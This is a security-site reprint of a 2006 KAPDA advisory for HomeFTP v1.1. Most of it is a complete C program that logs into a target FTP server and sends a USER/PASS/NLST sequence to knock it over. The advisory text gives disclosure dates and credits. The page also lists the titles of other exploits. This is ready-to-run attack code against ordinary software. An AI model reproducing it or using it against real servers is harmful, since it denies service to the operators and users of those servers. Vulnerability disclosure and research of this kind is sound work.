首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HomeFTP versions 1.1 and below remote denial of service exploit
来源:http://www.KAPDA.ir 作者:pi3ch 发布时间:2006-01-16  

[KAPDA::#21] - HomeFtp v1.1 Denial of Service

KAPDA New advisory

Vulnerable products : HomeFtp v1.1
Vendor: Helmsman(http://www.Frigate3.com)
Risk: High
Vulnerabilities: Denial of service

Date :
--------------------
Found : Aug 21 2005
Vendor Contacted : Aug 21 2005
Release Date : Jan 14 2006

About HomeFtp :
--------------------
FTP server that is easy to use. You can have shared files in your with most comfort.

Vulnerability:
--------------------
Denial of service:
A denial-of-service attack (also, DoS attack) is an attack on a computer system or network that causes a loss of service to users, typically the loss of network connectivity and services by consuming the bandwidth of the victim network or overloading the computational resources of the victim system.

Exploit:
--------------------
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

#define POCSTR "USER %s\x0d\x0aPASS %s\x0d\x0aNLST\x0d\x0a"

int header();
int usage(char *filename);
int remote_connect( char* ip, unsigned short port );

int header() {
printf("\n[i] KAPDA - Computer Security Science Researchers Institute\n\n");
printf("[i] Title: \tHomeFTP <= v1.1 Dos Exploit\n");
printf("[i] Discovered by: \tcvh {a] kapda.ir\n");
printf("[i] Exploit by: \tPi3cH {a] kapda.ir\n");
printf("[i] More info: \twww.kapda.ir/page-advisory.html\n\n");
return 0;
}

int usage(char *filename) {
printf("[i] Usage: \t%s HOST PORT USERNAME PASSWORD\n",filename);
printf("[i] Example: \t%s 127.0.0.1 21 anonymous none\n\n",filename);
exit(0);
}

int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;

memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[e] Cannot resolve \"%s\"\n", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[e] Socket failed!\n" );
exit(1);
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "[e] Failed connecting!\n" );
exit(1);
}
return ( s );
}


int main(int argc, char *argv[]) {
int s;
char *request;
header();
if( (argc < 5) )
usage(argv[0]);
request = (char *) malloc(1024);
printf("[r] Connecting to remote host\n");
s = remote_connect(argv[1],atoi(argv[2]));
sleep(1);
printf("[r] Creating buffer\n");
sprintf(request,POCSTR,argv[3],argv[4]);
printf("[r] Sending %d bytes of DOS buffer\n",strlen(request));
if ( send ( s, request, strlen (request), 0) <= 0 )
{
printf("[e] Failed to send buffer\n");
close(s);
exit(1);
}
sleep(1);
printf("[s] Exploit Done!\n");
close(s);
free(request);
request = NULL;
return 0;
}


Solution:
--------------------
Vendor has b鑤a program who fixes this problem


Original Advisory:
--------------------
http://www.kapda.ir/advisory-202.html

Credit :
--------------------
Discoverd by cvh [at} kapda.ir
Exploit by pi3ch [at} kapda.ir
Grtz to all members of KAPDA and GSO.
KAPDA - Computer Security Science Researchers Institute
http://www.KAPDA.ir




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows Metafile (WM
·Farmers WIFE version 4.4 sp1 f
·Serial Line Sniffer Buffer Ove
·Xmame 0.102 (-lang) Local Buff
·漏洞名称:Microsoft Windows图形
·VERITAS NetBackup Volume Manag
·eStara Softphone buffer overfl
·SimpleBlog version 2.1 is susc
·xmame -lang local buffer overf
·eyeBeam handling SIP header DO
·Cisco IP Phone 7940 remote den
·Eterm LibAST Configuration Eng
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved